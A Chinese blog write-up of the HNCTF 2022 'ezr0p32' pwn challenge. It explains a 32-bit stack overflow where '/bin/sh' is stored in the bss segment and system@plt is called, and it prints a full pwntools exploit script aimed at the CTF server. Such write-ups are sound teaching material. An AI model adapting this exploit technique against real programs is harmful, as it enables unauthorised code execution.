【PWN · ret2text | ‘/bin/sh‘写在bss段】[HNCTF 2022 Week1]ezr0p32

最新推荐文章于 2024-07-11 23:50:59 发布
最新推荐文章于 2024-07-11 23:50:59 发布
阅读量931 收藏 5
点赞数 1
分类专栏: 【PWN · Stack】 文章标签: ctf pwn /bin/sh system
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/131139431
版权

目录

前言

一、题目

二、解题过程

payload的构造 

三、exp 

总结

前言

一直在做libc的中规中矩的题目,遇到一题有点老的类型的题目有些陌生。但其实其中原理比较简单,但是涉及到/bin/sh获取的常规操作,而自己也没整理过,于是特此发篇笔记

一、题目

读入了超过buf长度的数据,存在栈溢出漏洞;调用了system,可以通过plt调用到该函数

然而需要注意两个buf的差别!! 

双击第一个buf

是bss段的全局变量

双击第二个buf

是本函数的局部变量,也就是可以溢出的部分。

——第一个bss可以填充/bin/sh,第二个用于system函数调用

二、解题过程

  1. 在第一个输入处输入"/bin/sh"
  2. 构造合适的payload在第二个输入处输入

payload的构造 

payload=垃圾数据(+填充ebp)+目标跳转地址+...+参数 

我们要调用system,这个可以填写system的plt的地址即可,然而32位参数放在栈上,需要我们构造,需要注意的是,参数不应直接跟在函数(目标函数地址)后面,而应该空开一个字,这是因为调用函数时,参数和ebp被同时压入栈中,而空开的字就是ebp的位置——简单来说,调用函数后,callee会将栈上的内容识别为ebp+参数,获取参数会越过ebp获取。所以我们要空开一个字

三、exp 

from pwn import *
from pwn import p32

# io=process("./ezr0p")
io=remote("node1.anna.nssctf.cn",28086)
elf=ELF("./ezr0p")

context(arch="i386",os='linux',log_level='debug')

io.recvuntil(b'name')
io.sendline(b'/bin/sh')
bss_addr=0x804a080

payload=b'a'*(0x1c+4)
payload+=p32(elf.plt['system'])
payload+=b'aaaa'
payload+=p32(bss_addr)

io.sendlineafter(b'time~',payload)

io.interactive()

总结

比较简单,也比较老套,所以更应该记住

Mr_Fmnwon
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8145
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
入门pwn题目ret2text
03-26
入门pwn题目ret2text
HNCTF 2022 Week1 easyoverflow
2301_79793667的博客
12-19 549
存在危险函数gets,填满数组v4后填充v5,当v5!=0时,自动弹出flag,所以要用变量覆。、先进行nc连接,发现输入一些东西后会被弹出程序。检查一下附件位数,用相应位数ida打开。首先开启环境,下载附件。
ret2text
m0_62280492的博客
07-11 779
x86和x64下常见的ret2text
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 1529
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss,这样就可以把binsh进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
攻防世界新手区pwn
ca1m4n的博客
11-03 694
攻防世界新手pwnget_shellexp get_shell 首先checksec一下 64位 只开启了栈可执行保护 ida打开 看主函数,好大一个system(/bin/sh) 然后puts和binsh地址差就是偏移量 exp rom pwn import * m=remote('220.249.52.133',xxxxx) binsh = 0x400574 payload='a'*(0x3a-0x18) +p64(binsh) m.sendline(payload) m.interactive()
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 687
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
二进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1587
帮助二进制安全爱好者入门~
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1648
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
pwn栈溢出学习 基本ROP——ret2shellcode
MrTreebook的博客
11-22 1038
ret2shellcode 目录ret2shellcode1.checksec看一下2.IDA pro看一下 1.checksec看一下 32位的文件 什么保护都没开,并且有可读,可,可执行 2.IDA pro看一下 gets函数读入一个 s 然后把 s 复制到 buf2
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1686
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
格式化字符串在bss上的处理
playmaker的博客
06-19 2600
格式化字符串在bss上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串的漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
基于Matlab的模糊PID控制系统设计及仿真.pdf
08-05
基于Matlab的模糊PID控制系统设计及仿真
黑马头条,黑马头条,黑马头条
08-05
黑马头条,黑马头条,黑马头条
基于ppo算法的计算卸载策略研究python
08-05
ppo算法 基于ppo算法的计算卸载策略研究 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
SQLTools插件下载与使用说明
08-05
1
超声波测试方案+气体+液体
08-05
超声波流量计应用的集成式超声波感应解决方案 (USS) 子系统
计算机网络开发 -Socket编程介绍.pdf
08-05
计算机网络开发 -Socket编程介绍
2023-04-06-项目笔记 - 第二百一十六阶 - 4.4.2.214全局变量的作用域-214 -2024.08.05
最新发布
08-05
2023-04-06-项目笔记-第二百一十六阶-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.214局变量的作用域_214- 2024-08-05
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习&mdash;&mdash;ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值